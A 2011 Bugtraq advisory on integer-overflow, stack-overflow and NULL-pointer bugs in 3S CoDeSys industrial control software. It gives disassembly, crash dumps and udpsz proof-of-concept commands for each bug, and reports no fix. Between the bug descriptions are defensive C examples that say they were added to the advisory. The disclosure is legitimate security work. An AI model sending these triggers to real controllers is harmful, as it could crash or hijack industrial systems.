Message-Id: <20111129181242.d97cee5c.aluigi@autistici.org>
Date: Tue, 29 Nov 2011 18:12:42 +0000
From: Luigi Auriemma <aluigi@...istici.org>
To: bugtraq@...urityfocus.com
Subject: Vulnerabilities in 3S CoDeSys 3.4 SP4 Patch 2
#######################################################################
Luigi Auriemma
Application: 3S CoDeSys
http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions: <= 3.4 SP4 Patch 2
Platforms: Windows
Bugs:         A] GatewayService integer overflow
              B] CmpWebServer stack overflow
              C] CmpWebServer Content-Length NULL pointer
              D] CmpWebServer invalid HTTP request NULL pointer
              E] CmpWebServer folders creation
Exploitation: remote
Date: 29 Nov 2011
Author: Luigi Auriemma
e-mail: aluigi@...istici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"The CoDeSys Automation Suite is a comprehensive software tool for
industrial automation technology. All common automation tasks solved by
means of software can be realized with the CoDeSys Suite based on the
wide-spread controller and PLC development system of the same name."
#######################################################################
=======
2) Bugs
=======
----------------------------------
A] GatewayService integer overflow
----------------------------------
GatewayService uses a 32-bit value at offset 0x0c of the header that
specifies the size of the data to receive.
The program takes this number, adds 0x34 and allocates that amount of
memory; the addition is unchecked, so a large value wraps around and a
much smaller buffer than needed is allocated (integer overflow):
0042CB30 /$ 55 PUSH EBP
0042CB31 |. 8BEC MOV EBP,ESP
0042CB33 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
0042CB36 |. 83C0 34 ADD EAX,34
0042CB39 |. 5D POP EBP
0042CB3A \. C3 RETN
...
00447AF7 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00447AFA |. 50 PUSH EAX
00447AFB |. E8 3050FEFF CALL GatewayS.0042CB30 ; + 0x34
00447B00 |. 83C4 04 ADD ESP,4
00447B03 |. 8945 0C MOV DWORD PTR SS:[EBP+C],EAX
00447B06 |> 6A 01 PUSH 1
00447B08 |. 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C]
00447B0B |. 51 PUSH ECX
00447B0C |. E8 A7050200 CALL GatewayS.004680B8 ; allocation
------------------------------
B] CmpWebServer stack overflow
------------------------------
CmpWebServer is the component used in services like 3SRTESrv3 and
CoDeSysControlService for handling the HTTP connections on port 8080.
The library is affected by a buffer overflow in the function 0040f480,
which copies the input URI into a limited stack buffer, allowing code
execution:
0040F5C5 |> 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]
0040F5C8 |. 2B55 08 SUB EDX,DWORD PTR SS:[EBP+8]
0040F5CB |. 52 PUSH EDX
0040F5CC |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
0040F5CF |. 50 PUSH EAX
0040F5D0 |. 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10]
0040F5D3 |. 51 PUSH ECX
0040F5D4 |. E8 97420000 CALL CoDeSysC.00413870 ; memcpy
-------------------------------------------
C] CmpWebServer Content-Length NULL pointer
-------------------------------------------
NULL pointer dereference caused by the lack of checks on the result of a
memory allocation whose size is taken, unverified, from the
Content-Length value of an HTTP POST request:
eax=812aa3a7 ebx=00a7ae7c ecx=20000000 edx=00000000 esi=012aa3a7 edi=00000000
eip=0128cc9a esp=02e9feec ebp=02e9fef4 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
CmpWebServer!ComponentEntry+0xb37a:
0128cc9a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
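Bugs A] and C] share one root cause: a size taken from the network is used for an allocation without validation, either in arithmetic that wraps (A) or with an allocation result that is never checked (C). The following C program is an added example of the checks a defender would expect at those two points; it is not code from the advisory or from 3S. The 0x34 overhead and the 0xfffffff2 / 4294967295 values come from the advisory; MAX_BODY_BYTES, the function names and the return conventions are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Header overhead the advisory describes for GatewayService (0x34 bytes).
 * MAX_BODY_BYTES is an assumed policy ceiling chosen for this example; the
 * product's real limit, if any, is not stated in the advisory. */
#define HEADER_OVERHEAD 0x34u
#define MAX_BODY_BYTES  (16u * 1024u * 1024u)

/* Bug A pattern: the declared length is added to the overhead in 32-bit
 * arithmetic with no check, so a length near UINT32_MAX wraps to a tiny
 * allocation that is then filled with far more data than it can hold. */
uint32_t unchecked_alloc_size(uint32_t declared_len)
{
    return declared_len + HEADER_OVERHEAD;   /* 0xfffffff2 + 0x34 wraps to 0x26 */
}

/* Hardened form: refuse lengths that would wrap and lengths above the
 * policy ceiling. Returns 0 on rejection, which is never a valid size
 * because the smallest valid size is HEADER_OVERHEAD itself. */
uint32_t checked_alloc_size(uint32_t declared_len)
{
    if (declared_len > UINT32_MAX - HEADER_OVERHEAD) return 0;  /* would wrap */
    if (declared_len > MAX_BODY_BYTES) return 0;                /* above ceiling */
    return declared_len + HEADER_OVERHEAD;
}

/* Bug C pattern: Content-Length 4294967295 is handed straight to the
 * allocator, the failed allocation is never checked, and the body copy
 * (the rep movs in the advisory's crash dump) writes through a NULL pointer.
 * Here the size is validated first and a failed allocation is an error. */
unsigned char *alloc_request_body(uint32_t content_length, uint32_t *out_size)
{
    uint32_t size = checked_alloc_size(content_length);
    if (size == 0) return NULL;                 /* caller rejects the request */
    unsigned char *buf = calloc(1, size);
    if (buf == NULL) return NULL;               /* never memcpy into NULL */
    *out_size = size;
    return buf;
}

/* Convenience wrapper: 1 if a body of this declared length is accepted
 * and successfully allocated, 0 otherwise. */
int body_accepted(uint32_t content_length)
{
    uint32_t size = 0;
    unsigned char *buf = alloc_request_body(content_length, &size);
    if (buf == NULL) return 0;
    free(buf);
    return 1;
}

int main(void)
{
    /* Values from the advisory: 0xfffffff2 (bug A) and 4294967295 (bug C). */
    printf("unchecked 0xfffffff2 + 0x34 = 0x%x\n", unchecked_alloc_size(0xfffffff2u));
    printf("checked   0xfffffff2        = %u (0 = rejected)\n", checked_alloc_size(0xfffffff2u));
    printf("Content-Length 4294967295 accepted? %d\n", body_accepted(0xffffffffu));
    printf("Content-Length 64 accepted?         %d\n", body_accepted(64u));
    return 0;
}
```

The wrap check compares against UINT32_MAX minus the overhead before adding, which is the only order that is safe in unsigned 32-bit arithmetic; checking the sum after the fact cannot distinguish a wrapped result from a genuinely small request.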
-------------------------------------------------
D] CmpWebServer invalid HTTP request NULL pointer
-------------------------------------------------
NULL pointer dereference caused by an unexpected HTTP request method
other than GET, POST or HEAD:
eax=028228d4 ebx=00000009 ecx=00000004 edx=02822957 esi=00000000 edi=00000005
eip=0128dd6c esp=02e9fed4 ebp=02e9fee0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
CmpWebServer!ComponentEntry+0xc44c:
0128dd6c 3a51fc cmp dl,byte ptr [ecx-4] ds:0023:00000000=??
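Bugs B] and D] both live in the request-line handling of CmpWebServer: an unbounded copy of the URI into a fixed stack buffer (B) and a method other than GET, POST or HEAD that leaves a NULL value to be dereferenced (D). The C parser below is an added example of how a request line is parsed defensively against both; it is not the advisory's or 3S's code. URI_MAX, the enum and result-code names, and the 256-byte buffer size are assumptions for this example (the real buffer size in CmpWebServer is not given in the advisory).

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Fixed-size destination standing in for the limited stack buffer the
 * advisory describes; 256 is an assumption made for this example. */
#define URI_MAX 256

enum http_method { HTTP_GET, HTTP_POST, HTTP_HEAD, HTTP_UNSUPPORTED };

struct request_line {
    enum http_method method;
    char uri[URI_MAX];
};

/* Result codes the caller maps to an HTTP status instead of crashing. */
#define RL_OK            0
#define RL_MALFORMED    -1   /* 400 Bad Request or 414 URI Too Long */
#define RL_UNSUPPORTED  -2   /* 501 Not Implemented */

/* Bug D pattern: a method token outside GET/POST/HEAD yields a NULL handler
 * or descriptor that is then dereferenced. Mapping every other token to an
 * explicit HTTP_UNSUPPORTED value forces the caller to handle it. */
static enum http_method parse_method(const char *s, size_t n)
{
    if (n == 3 && memcmp(s, "GET", 3) == 0)  return HTTP_GET;
    if (n == 4 && memcmp(s, "POST", 4) == 0) return HTTP_POST;
    if (n == 4 && memcmp(s, "HEAD", 4) == 0) return HTTP_HEAD;
    return HTTP_UNSUPPORTED;
}

/* Parses "METHOD SP URI SP HTTP/1.x" (without the trailing CRLF) into *out. */
int parse_request_line(const char *line, size_t len, struct request_line *out)
{
    const char *end = line + len;
    const char *sp1 = memchr(line, ' ', len);
    if (sp1 == NULL) return RL_MALFORMED;

    enum http_method m = parse_method(line, (size_t)(sp1 - line));
    if (m == HTTP_UNSUPPORTED) return RL_UNSUPPORTED;

    const char *uri = sp1 + 1;
    const char *sp2 = memchr(uri, ' ', (size_t)(end - uri));
    if (sp2 == NULL) return RL_MALFORMED;
    size_t uri_len = (size_t)(sp2 - uri);

    /* Bug B pattern: memcpy(stack_buf, uri, uri_len) with uri_len taken from
     * the request and never compared against the buffer size. The bound is
     * enforced here before a single byte is copied. */
    if (uri_len == 0 || uri_len >= URI_MAX) return RL_MALFORMED;

    const char *ver = sp2 + 1;
    if ((size_t)(end - ver) != 8 || memcmp(ver, "HTTP/1.", 7) != 0 ||
        (ver[7] != '0' && ver[7] != '1')) return RL_MALFORMED;

    memcpy(out->uri, uri, uri_len);
    out->uri[uri_len] = '\0';
    out->method = m;
    return RL_OK;
}

/* Convenience: parse a NUL-terminated request line and return the code. */
int classify_request_line(const char *line, struct request_line *out)
{
    return parse_request_line(line, strlen(line), out);
}

/* Builds a request line whose URI is longer than URI_MAX (constructed input)
 * and returns the parser's verdict; the hardened parser must reject it. */
int oversized_uri_verdict(void)
{
    char line[URI_MAX + 64];
    struct request_line r;
    memcpy(line, "GET /", 5);
    memset(line + 5, 'a', URI_MAX + 10);
    memcpy(line + 5 + URI_MAX + 10, " HTTP/1.0", 10);   /* 9 chars plus NUL */
    return classify_request_line(line, &r);
}

int main(void)
{
    struct request_line r;
    printf("GET /index.htm HTTP/1.0 -> %d\n", classify_request_line("GET /index.htm HTTP/1.0", &r));
    printf("BLAH / HTTP/1.0         -> %d\n", classify_request_line("BLAH / HTTP/1.0", &r));
    printf("oversized URI           -> %d\n", oversized_uri_verdict());
    return 0;
}
```

The length check happens before the copy and the unsupported method is a distinct return value rather than a NULL, so every outcome the advisory's crash dumps show (a copy that runs past the buffer, a compare against address 0) is turned into an ordinary error response.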
--------------------------------
E] CmpWebServer folders creation
--------------------------------
Not a security bug (at least at the moment), but weird and funny enough
to be worth noting.
The web server calls CreateDirectory at address 0041206d before a
subsequent CreateFile (read mode).
The only possible attack scenario I can imagine may be in case the
server automatically generates logs or other files and this bug will
prevent their creation due to the presence of folders with the same
names, but I don't know the software enough to confirm this scenario.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
A]
udpsz -T -b 0x61 -X 0xc 32 l 0xfffffff2 -1 -l 0 -D SERVER 1217 0xffff
B]
udpsz -c "GET /" 0 -b a -c "\\a HTTP/1.0\r\n\r\n" -1 -T -D SERVER 8080 8192
C]
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
D]
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
E]
udpsz -T -c "GET /dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
...
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
---
Luigi Auriemma
http://aluigi.org